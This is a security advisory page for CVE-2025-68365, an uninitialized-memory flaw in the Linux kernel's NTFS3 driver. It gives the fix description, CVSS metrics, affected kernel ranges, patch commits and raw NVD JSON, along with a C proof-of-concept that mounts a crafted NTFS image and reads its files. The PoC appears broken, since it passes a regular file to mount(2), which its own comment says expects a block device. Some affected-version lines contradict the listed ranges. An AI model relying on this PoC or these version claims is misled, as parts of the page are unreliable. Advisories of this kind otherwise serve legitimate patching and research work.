Security Vulnerability Report
CVE-2025-68365 CVSS 5.5 MEDIUM

CVE-2025-68365

Published: 2025-12-24 11:16:00
Last Modified: 2026-02-26 18:44:18
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

fs/ntfs3: Initialize allocated memory before use

KMSAN reports: Multiple uninitialized values detected:

- KMSAN: uninit-value in ntfs_read_hdr (3)
- KMSAN: uninit-value in bcmp (3)

Memory is allocated by __getname(), which is a wrapper for kmem_cache_alloc(). This memory is used before being properly cleared. Change kmem_cache_alloc() to kmem_cache_zalloc() to properly allocate and clear memory before use.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (>= 5.15, < 5.15.199) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (>= 5.16, < 6.1.162) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (>= 6.2, < 6.6.122) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (>= 6.7, < 6.12.68) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (>= 6.13, < 6.18.2) - VULNERABLE
Linux Kernel < 5.15 (with NTFS3 enabled)
Linux Kernel < 5.16 (with NTFS3 enabled)
Linux Kernel < 5.17 (with NTFS3 enabled)
Linux Kernel < 5.18 (with NTFS3 enabled)
Specific commits: 192e8ce302f14ac66259231dd10cede19858d742
Specific commits: 7d52c592cf53f5bb7163967edc01d2d7d80de44a
Specific commits: a58e29849aef8d26554a982989a2190b49aaf8ed
Specific commits: a8a3ca23bbd9d849308a7921a049330dc6c91398
Specific commits: bdf38063fd15f2fc7361dc0b5d3c259741eab835

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2025-68365 PoC - Trigger uninitialized memory in NTFS3 ntfs_read_hdr
// This PoC demonstrates the vulnerability by mounting a crafted NTFS image
// Requires: Linux kernel with NTFS3 support enabled

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mount.h>
#include <sys/stat.h>   /* mkdir() */
#include <errno.h>

/*
 * To trigger this vulnerability:
 * 1. Build kernel with KMSAN enabled
 * 2. Create a malicious NTFS filesystem image
 * 3. Mount it using NTFS3 driver
 * 4. Trigger ntfs_read_hdr() by reading directory entries
 *
 * The vulnerability occurs because:
 * - __getname() allocates memory via kmem_cache_alloc()
 * - This memory is used before being zeroed
 * - kmsan reports uninit-value in ntfs_read_hdr and bcmp
 */
int trigger_ntfs3_vulnerability(const char *ntfs_image_path)
{
    const char *mount_point = "/tmp/ntfs_test_mount";
    int ret;

    // Create mount point (an already existing directory is fine)
    if (mkdir(mount_point, 0755) != 0 && errno != EEXIST) {
        fprintf(stderr, "mkdir failed: %s\n", strerror(errno));
        return -1;
    }

    // Mount NTFS image using NTFS3 driver
    // This will trigger ntfs_read_hdr() when reading directory entries
    // Note: mount(2) expects a block device as its source, not a regular file
    ret = mount(ntfs_image_path, mount_point, "ntfs3", 0, NULL);
    if (ret != 0) {
        fprintf(stderr, "Mount failed: %s\n", strerror(errno));
        rmdir(mount_point);
        return -1;
    }

    // Trigger directory listing which calls ntfs_read_hdr
    system("ls -la /tmp/ntfs_test_mount/");

    // Read files to trigger more ntfs_read_hdr calls
    // (the backslash is doubled so the shell receives "\;")
    system("find /tmp/ntfs_test_mount -type f -exec cat {} \\; 2>/dev/null");

    // Unmount
    umount(mount_point);
    rmdir(mount_point);
    return 0;
}

int main(int argc, char *argv[])
{
    if (argc != 2) {
        fprintf(stderr, "Usage: %s <ntfs_image_path>\n", argv[0]);
        return 1;
    }
    return trigger_ntfs3_vulnerability(argv[1]);
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68365", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-12-24T11:16:00.063", "lastModified": "2026-02-26T18:44:18.100", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs/ntfs3: Initialize allocated memory before use\n\nKMSAN reports: Multiple uninitialized values detected:\n\n- KMSAN: uninit-value in ntfs_read_hdr (3)\n- KMSAN: uninit-value in bcmp (3)\n\nMemory is allocated by __getname(), which is a wrapper for\nkmem_cache_alloc(). This memory is used before being properly\ncleared. Change kmem_cache_alloc() to kmem_cache_zalloc() to\nproperly allocate and clear memory before use."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-908"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.15", "versionEndExcluding": "5.15.199", "matchCriteriaId": "3F9487DA-0705-4945-A8B3-1460DE840D0A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.162", "matchCriteriaId": "6579E0D4-0641-479D-A4C3-0EF618798C55"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", 
"versionEndExcluding": "6.6.122", "matchCriteriaId": "8EAAE395-0162-4BAF-9AD5-E9AF3C869C4F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.68", "matchCriteriaId": "52F38E19-0FDD-4992-9D6D-D4169D689598"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.2", "matchCriteriaId": "BD6A474E-1AF3-4675-9A46-086E5D8F61CC"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/192e8ce302f14ac66259231dd10cede19858d742", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7d52c592cf53f5bb7163967edc01d2d7d80de44a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a58e29849aef8d26554a982989a2190b49aaf8ed", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a8a3ca23bbd9d849308a7921a049330dc6c91398", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/bdf38063fd15f2fc7361dc0b5d3c259741eab835", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f7728057220cabd720e27e46097edad48e5bd728", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}